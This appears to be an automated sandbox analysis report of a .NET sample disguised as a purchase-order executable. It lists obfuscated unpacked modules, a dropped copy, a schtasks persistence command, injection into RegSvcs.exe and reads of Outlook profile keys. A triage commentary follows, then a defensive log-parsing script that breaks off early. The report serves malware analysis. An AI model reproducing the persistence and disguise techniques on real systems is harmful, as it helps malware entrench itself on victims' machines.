Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe | Section loaded: loadperf.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Windows\System32\wbem\WMIADAP.exe | File written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
Source: purchase order - PO-011024-201.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: purchase order - PO-011024-201.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: purchase order - PO-011024-201.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: GVAj.pdbSHA256 | source: purchase order - PO-011024-201.exe, jDCErdK.exe.0.dr
Source: Binary string: GVAj.pdb | source: purchase order - PO-011024-201.exe, jDCErdK.exe.0.dr

Data Obfuscation

Source: purchase order - PO-011024-201.exe, frm_login.cs | .Net Code: InitializeComponent
Source: jDCErdK.exe.0.dr, frm_login.cs | .Net Code: InitializeComponent
Source: 0.2.purchase order - PO-011024-201.exe.5b20000.8.raw.unpack, -Module-.cs | .Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.purchase order - PO-011024-201.exe.5b20000.8.raw.unpack, PingPong.cs | .Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, fsrIvttXdmKqMmWchj.cs | .Net Code: gD5R8QiKx1 System.Reflection.Assembly.Load(byte[])
Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, fsrIvttXdmKqMmWchj.cs | .Net Code: gD5R8QiKx1 System.Reflection.Assembly.Load(byte[])
Source: purchase order - PO-011024-201.exe | Static PE information: 0xA98D3912 [Sat Feb 21 15:58:10 2060 UTC]
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Code function: 0_2_05060C01 push 8BBCEB50h; ret 0_2_05060C07
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Code function: 0_2_05064C38 push esp; retf 0_2_05064C39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01310C6D push edi; retf 8_2_01310C7A
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Code function: 9_2_0109F110 pushad ; iretd 9_2_0109F111
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 13_2_00DC0C6D push edi; retf 13_2_00DC0C7A
Source: purchase order - PO-011024-201.exe | Static PE information: section name: .text entropy: 7.154325575878405
Source: jDCErdK.exe.0.dr | Static PE information: section name: .text entropy: 7.154325575878405
Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, US53hBeX2Yv4yyUQQS.cs | High entropy of concatenated method names: 'ToString', 'j3n6e3nORq', 'sj96wtB724', 'k9w6DOxn6l', 'gZ86QMtG2Y', 'r2e6oXd7D5', 'h6f6PCxQYj', 'emn6XRCx1g', 'RWD6kYcCFK', 'h6O6xoj3lo'
Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, HSVRsurxF9WEZHbBtg.cs | High entropy of concatenated method names: 'RJPjIRwXuB', 'PFLjg1gJKa', 'vuCjiYQc87', 'C16jTGA92R', 'txXjC0pniN', 'VJfj6XDJYd', 'hfgmy59HCY4M7nBtoq', 'HJ52Qwxkc1erEmdaS9', 'Ct5jjkht7m', 'xqZjG6MLo4'
Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, QWCRbbI3GySMOlMgIK.cs | High entropy of concatenated method names: 'aqxdUKh5lj', 'ItVd0OBJkM', 'vS7dAnsiuZ', 'rCVdWKcxa1', 'W9sdCG8pQJ', 'Burd6kOSeQ', 'cmpdMXy51X', 'gKpdStG7U0', 'rqtdaM3P2w', 'KDFdto3big'
Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, UAqO0Z5BuvB48Dfytc.cs | High entropy of concatenated method names: 'Mj4qsOk4Dp', 'BIZqHsSMst', 'OiGqvmd1rh', 'IGiqLoZHgo', 'BPEqbfYEtv', 'qd2q5Zu56U', 'vepq1otiQS', 'a3HqJKEQMe', 'MLBq3f7Gi2', 'XwvqYtWeUT'
Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, d5xZqVotHfWSRMXhZ1.cs | High entropy of concatenated method names: 'Ujq8OZyua', 'DPwUFF4Jy', 'P5X0kkgsh', 'HciyJY8Oc', 'Xg1WrrSQn', 'j4J4nuP2k', 'QFdhO1JAmlkFyDGAuI', 'Qu2eUwXKVePJR4EXIr', 'WxJSBulnK', 'yPEt1DJjr'
Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, z3LmuL4b9jRNKbPX8bF.cs | High entropy of concatenated method names: 'JUyamExD3Y', 'l5Oaf8LgWn', 'mGoa8P1Vsg', 'zctaUvU2S2', 'rAbaNglrh7', 'wEGa0uqUyQ', 'y5Kay9soJV', 'ILwaAvCwTm', 'Q3baW4Sdex', 'rNHa4mAR82'
Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, uhsEbYft7aKYZux5VK.cs | High entropy of concatenated method names: 'LhPaj5Dnxh', 'TS5aGxOBap', 'q3maRfEx9A', 'GK7alpSxnR', 'KBNaqsm08f', 'a9VaZeBReG', 'TpeanLYg8u', 'NO3S1xtLsV', 'V5SSJUj7J4', 'e4CS3JMY18'
Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, y58Y9F7xpCVn0tEdfc.cs | High entropy of concatenated method names: 'KOnMJeug24', 'NWwMYEhipC', 'R2lSr97Kkq', 'dwRSj61Vu6', 'MlXMeykVyh', 'mDwMVN6Q01', 'zZ5MhMHwKG', 'nNAMsliyGS', 'zZMMHQYjuK', 'ENwMvmnmoe'
Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, OJYY5LkN8SVEi7q0ZP.cs | High entropy of concatenated method names: 'Mf7ZNOu2fM', 'BUwZyY9P3j', 'r1rdDbD56I', 'QFUdQ3KqGq', 'vZNdo18q1U', 'jTPdPiVSFE', 'q2gdXpCHFb', 'smsdk5YP71', 'uNSdxSujie', 'iL4dFkXD4p'
Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, bvN3s3644Act0Z55I1.cs | High entropy of concatenated method names: 'yXiIllQss4', 'EPPId0XEOQ', 'VRpIniOebJ', 'SsenY2Wa5i', 'TGmnz1vI2Y', 'hcYIrEW3Nu', 'ul3Ijx6ZDo', 'BKfI7kcTDO', 'YycIGhBEoP', 'euGIRvNQGQ'
Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, Ew5TcBzrgyvqynmUSS.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'O9Aa9i8OUe', 'aDEaCv6d7a', 'zgFa6RiTKf', 'vCpaMDYvQS', 'Fr5aSKYvA3', 'lNEaa1cfFf', 'RvyatnVdQN'
Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, uVG0PXFe9nfInx7Pdk.cs | High entropy of concatenated method names: 'ovcn2g1KXd', 'bxynqW1ved', 'SeOnZJmBrV', 'PUVnIXjW69', 'GLIngqlZMw', 'CgMZbQTDIT', 'tkaZ5sbah8', 'g4MZ1uMFvO', 'rJeZJviFCL', 'y7cZ314lK6'
Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, T3uKypOkAr9vDMmxpI.cs | High entropy of concatenated method names: 'YBvCFeLN6D', 'kdfCVeFfEt', 'rEGCsCFKoX', 'A5sCHkkZAZ', 'uigCwLcgOR', 'Rn8CD6ODLj', 'K0TCQrVyJH', 'zLACoZOc1M', 'y2ECPk9NfD', 'uj6CXZCMZ3'
Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, p66OHUaTFBsviW7LIo.cs | High entropy of concatenated method names: 'Dispose', 'AMsj3r77BD', 'XVn7wIqyq2', 'uphOO5xddc', 'RkUjY38kvw', 'uiFjzIPKFu', 'ProcessDialogKey', 'Dxr7r4lLZq', 'yh77jRswAp', 'gsO77dEICu'
Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, fsrIvttXdmKqMmWchj.cs | High entropy of concatenated method names: 'PyCG2gRWBy', 'YqgGlfIDbB', 'CtfGq8a3mm', 'QS9Gdpjc3p', 'UDsGZQJb7o', 'AanGneUVQS', 'kTgGIcN6Q3', 'pp8GgEhaEk', 'f1tGcD81Wr', 'tS1Girghq0'
Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, WcaNQhB3bw1x35cBHL.cs | High entropy of concatenated method names: 'QeUImDipFo', 'VLgIfaAVy2', 'BnPI8hDYeK', 'fYeIUwMcNo', 'nJSINxh3HL', 'FywI0hM8FO', 'xjIIyJOVo1', 'e8kIAsE5C8', 'kLaIWfdAry', 'HQnI4DHXsk'
Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, BvSJtFG5lWjZ7c1TuV.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'vam73npoQn', 'uwD7YIIhPe', 'Jei7zY76H4', 'rO6Gr8FerQ', 'rRCGj5hgq1', 'x74G78GIMR', 'MXfGGAUV9M', 'L0aG0eMtHyjHRCLMOPh'
Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, H9EGUT2SKjXSJfk38q.cs | High entropy of concatenated method names: 'KdCMi83bL8', 'AUSMTdqiNa', 'ToString', 'GDAMld4Zg7', 'xNoMqfMyN1', 'fgYMdocHEc', 's58MZUsN3A', 'yBPMnl1vxM', 'pXgMIvWQTt', 'VlTMg2nD6m'
Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, LO5KghyFmULJZEXBJx.cs | High entropy of concatenated method names: 'ffR9ANwNJr', 'GOp9WqWOYX', 'uZk9pqylTW', 'S3w9wnnLtq', 'lO99QrGL3G', 'LZ89oBYbhs', 'TqD9XReOJa', 'Pa89klqZ9x', 'I5c9FVwRgc', 'C3h9e5N6nF'
Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, vXxeeL4UMKpi5529nPR.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'JurtsH1nIn', 'OlftH44lV6', 'dZatvyKva4', 'WkstLG4C6n', 'EjYtbZ7Wq3', 'BKvt545Wtf', 'qeYt1DnTZp'
Source: 0.2.purchase order - PO-011024-201.exe.41f88e8.7.raw.unpack, pt09oCJZUOjinJQ3Wg.cs | High entropy of concatenated method names: 'ADTSlRbq7L', 'MCkSqKirvH', 'ICCSdeLA6Q', 'LwuSZFUIRg', 'KH8SnxngwD', 'gudSIxLKuy', 'w8KSg1YgOR', 'UbWScFVQIg', 'UmASiWidMk', 'i9aSTsjhn6'
Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, US53hBeX2Yv4yyUQQS.cs | High entropy of concatenated method names: 'ToString', 'j3n6e3nORq', 'sj96wtB724', 'k9w6DOxn6l', 'gZ86QMtG2Y', 'r2e6oXd7D5', 'h6f6PCxQYj', 'emn6XRCx1g', 'RWD6kYcCFK', 'h6O6xoj3lo'
Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, HSVRsurxF9WEZHbBtg.cs | High entropy of concatenated method names: 'RJPjIRwXuB', 'PFLjg1gJKa', 'vuCjiYQc87', 'C16jTGA92R', 'txXjC0pniN', 'VJfj6XDJYd', 'hfgmy59HCY4M7nBtoq', 'HJ52Qwxkc1erEmdaS9', 'Ct5jjkht7m', 'xqZjG6MLo4'
Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, QWCRbbI3GySMOlMgIK.cs | High entropy of concatenated method names: 'aqxdUKh5lj', 'ItVd0OBJkM', 'vS7dAnsiuZ', 'rCVdWKcxa1', 'W9sdCG8pQJ', 'Burd6kOSeQ', 'cmpdMXy51X', 'gKpdStG7U0', 'rqtdaM3P2w', 'KDFdto3big'
Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, UAqO0Z5BuvB48Dfytc.cs | High entropy of concatenated method names: 'Mj4qsOk4Dp', 'BIZqHsSMst', 'OiGqvmd1rh', 'IGiqLoZHgo', 'BPEqbfYEtv', 'qd2q5Zu56U', 'vepq1otiQS', 'a3HqJKEQMe', 'MLBq3f7Gi2', 'XwvqYtWeUT'
Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, d5xZqVotHfWSRMXhZ1.cs | High entropy of concatenated method names: 'Ujq8OZyua', 'DPwUFF4Jy', 'P5X0kkgsh', 'HciyJY8Oc', 'Xg1WrrSQn', 'j4J4nuP2k', 'QFdhO1JAmlkFyDGAuI', 'Qu2eUwXKVePJR4EXIr', 'WxJSBulnK', 'yPEt1DJjr'
Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, z3LmuL4b9jRNKbPX8bF.cs | High entropy of concatenated method names: 'JUyamExD3Y', 'l5Oaf8LgWn', 'mGoa8P1Vsg', 'zctaUvU2S2', 'rAbaNglrh7', 'wEGa0uqUyQ', 'y5Kay9soJV', 'ILwaAvCwTm', 'Q3baW4Sdex', 'rNHa4mAR82'
Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, uhsEbYft7aKYZux5VK.cs | High entropy of concatenated method names: 'LhPaj5Dnxh', 'TS5aGxOBap', 'q3maRfEx9A', 'GK7alpSxnR', 'KBNaqsm08f', 'a9VaZeBReG', 'TpeanLYg8u', 'NO3S1xtLsV', 'V5SSJUj7J4', 'e4CS3JMY18'
Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, y58Y9F7xpCVn0tEdfc.cs | High entropy of concatenated method names: 'KOnMJeug24', 'NWwMYEhipC', 'R2lSr97Kkq', 'dwRSj61Vu6', 'MlXMeykVyh', 'mDwMVN6Q01', 'zZ5MhMHwKG', 'nNAMsliyGS', 'zZMMHQYjuK', 'ENwMvmnmoe'
Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, OJYY5LkN8SVEi7q0ZP.cs | High entropy of concatenated method names: 'Mf7ZNOu2fM', 'BUwZyY9P3j', 'r1rdDbD56I', 'QFUdQ3KqGq', 'vZNdo18q1U', 'jTPdPiVSFE', 'q2gdXpCHFb', 'smsdk5YP71', 'uNSdxSujie', 'iL4dFkXD4p'
Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, bvN3s3644Act0Z55I1.cs | High entropy of concatenated method names: 'yXiIllQss4', 'EPPId0XEOQ', 'VRpIniOebJ', 'SsenY2Wa5i', 'TGmnz1vI2Y', 'hcYIrEW3Nu', 'ul3Ijx6ZDo', 'BKfI7kcTDO', 'YycIGhBEoP', 'euGIRvNQGQ'
Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, Ew5TcBzrgyvqynmUSS.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'O9Aa9i8OUe', 'aDEaCv6d7a', 'zgFa6RiTKf', 'vCpaMDYvQS', 'Fr5aSKYvA3', 'lNEaa1cfFf', 'RvyatnVdQN'
Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, uVG0PXFe9nfInx7Pdk.cs | High entropy of concatenated method names: 'ovcn2g1KXd', 'bxynqW1ved', 'SeOnZJmBrV', 'PUVnIXjW69', 'GLIngqlZMw', 'CgMZbQTDIT', 'tkaZ5sbah8', 'g4MZ1uMFvO', 'rJeZJviFCL', 'y7cZ314lK6'
Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, T3uKypOkAr9vDMmxpI.cs | High entropy of concatenated method names: 'YBvCFeLN6D', 'kdfCVeFfEt', 'rEGCsCFKoX', 'A5sCHkkZAZ', 'uigCwLcgOR', 'Rn8CD6ODLj', 'K0TCQrVyJH', 'zLACoZOc1M', 'y2ECPk9NfD', 'uj6CXZCMZ3'
Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, p66OHUaTFBsviW7LIo.cs | High entropy of concatenated method names: 'Dispose', 'AMsj3r77BD', 'XVn7wIqyq2', 'uphOO5xddc', 'RkUjY38kvw', 'uiFjzIPKFu', 'ProcessDialogKey', 'Dxr7r4lLZq', 'yh77jRswAp', 'gsO77dEICu'
Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, fsrIvttXdmKqMmWchj.cs | High entropy of concatenated method names: 'PyCG2gRWBy', 'YqgGlfIDbB', 'CtfGq8a3mm', 'QS9Gdpjc3p', 'UDsGZQJb7o', 'AanGneUVQS', 'kTgGIcN6Q3', 'pp8GgEhaEk', 'f1tGcD81Wr', 'tS1Girghq0'
Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, WcaNQhB3bw1x35cBHL.cs | High entropy of concatenated method names: 'QeUImDipFo', 'VLgIfaAVy2', 'BnPI8hDYeK', 'fYeIUwMcNo', 'nJSINxh3HL', 'FywI0hM8FO', 'xjIIyJOVo1', 'e8kIAsE5C8', 'kLaIWfdAry', 'HQnI4DHXsk'
Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, BvSJtFG5lWjZ7c1TuV.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'vam73npoQn', 'uwD7YIIhPe', 'Jei7zY76H4', 'rO6Gr8FerQ', 'rRCGj5hgq1', 'x74G78GIMR', 'MXfGGAUV9M', 'L0aG0eMtHyjHRCLMOPh'
Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, H9EGUT2SKjXSJfk38q.cs | High entropy of concatenated method names: 'KdCMi83bL8', 'AUSMTdqiNa', 'ToString', 'GDAMld4Zg7', 'xNoMqfMyN1', 'fgYMdocHEc', 's58MZUsN3A', 'yBPMnl1vxM', 'pXgMIvWQTt', 'VlTMg2nD6m'
Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, LO5KghyFmULJZEXBJx.cs | High entropy of concatenated method names: 'ffR9ANwNJr', 'GOp9WqWOYX', 'uZk9pqylTW', 'S3w9wnnLtq', 'lO99QrGL3G', 'LZ89oBYbhs', 'TqD9XReOJa', 'Pa89klqZ9x', 'I5c9FVwRgc', 'C3h9e5N6nF'
Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, vXxeeL4UMKpi5529nPR.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'JurtsH1nIn', 'OlftH44lV6', 'dZatvyKva4', 'WkstLG4C6n', 'EjYtbZ7Wq3', 'BKvt545Wtf', 'qeYt1DnTZp'
Source: 0.2.purchase order - PO-011024-201.exe.cf60000.11.raw.unpack, pt09oCJZUOjinJQ3Wg.cs | High entropy of concatenated method names: 'ADTSlRbq7L', 'MCkSqKirvH', 'ICCSdeLA6Q', 'LwuSZFUIRg', 'KH8SnxngwD', 'gudSIxLKuy', 'w8KSg1YgOR', 'UbWScFVQIg', 'UmASiWidMk', 'i9aSTsjhn6'
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | File created: C:\Users\user\AppData\Roaming\jDCErdK.exe

Boot Survival

Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmpA55D.tmp"
Source: C:\Windows\System32\wbem\WMIADAP.exe | Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WmiApRpl\Performance

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\wbem\WMIADAP.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance Performance Data
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Process information set: NOOPENFILEERRORBOX  (59 occurrences)
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exe  Process information set: NOOPENFILEERRORBOX  (45 occurrences)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Process information set: NOOPENFILEERRORBOX  (63 occurrences)
                    Source: C:\Windows\System32\wbem\WMIADAP.exe  Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wbem\WMIADAP.exe  Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wbem\WMIADAP.exe  Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
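                    Two things a triager should keep in mind when reading the behaviour lines above and the evasion signatures listed for this sample. First, NOOPENFILEERRORBOX is the SEM_NOOPENFILEERRORBOX flag passed to SetErrorMode, and this report shows it for powershell.exe and WMIADAP.exe as well as for the sample and its dropped copy, so the flag on its own separates nothing. Second, for a .NET sample (the report identifies .NET source code and RegSvcs.exe as the injection host), reserve-with-write-watch allocations come from the CLR garbage collector, and a reported delay of 922337203685477 ms is Int64.MaxValue ticks divided by 10,000 ticks per millisecond, i.e. TimeSpan.MaxValue, the value a .NET wait with an effectively infinite timeout produces; neither is a deliberate evasion on its own. The stronger evasion signals in a report like this are the WMI Win32_NetworkAdapterConfiguration enumeration (used to read adapter MAC prefixes and vendor strings for VM detection) and a thread that calls a delay function thousands of times.

                    The following Python script is an added example, not part of Joe Sandbox or of this report. It parses lines in the report's own "Source: <image path><event>: <value>[Jump to behavior]" form, tolerates both the fused and the space-separated variants, aggregates per process, and applies the triage rules above. The sample lines are a constructed subset copied from this report; the STALL_CALL_THRESHOLD value and the rule set are this example's own assumptions.

```python
"""Triage helper for Joe Sandbox 'Source: <process> <event>: <value>' behaviour lines.

Added example, not Joe Sandbox code. Thresholds and rules are assumptions.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# TimeSpan.MaxValue in milliseconds: Int64.MaxValue ticks / 10,000 ticks per ms.
# A .NET wait with this timeout shows up in Joe Sandbox as "delay time: 922337203685477".
DOTNET_MAX_DELAY_MS = (2**63 - 1) // 10_000

# Assumption: this many delay calls from a single thread is treated as time stalling.
STALL_CALL_THRESHOLD = 1000

# Classes a VM check typically enumerates (MAC OUI / adapter name lookups).
VM_WMI_CLASSES = {"Win32_NetworkAdapterConfiguration", "Win32_NetworkAdapter"}

LINE_RE = re.compile(
    r"^\s*Source:\s*(?P<proc>[A-Za-z]:\\.+?\.exe)\s*"   # Windows image path ending in .exe
    r"(?P<event>[A-Za-z /]+?):\s*(?P<value>.+?)"        # e.g. 'Memory allocated: ...'
    r"(?:Jump to behavior)?\s*$"                         # drop the report's link text
)


def parse_line(line):
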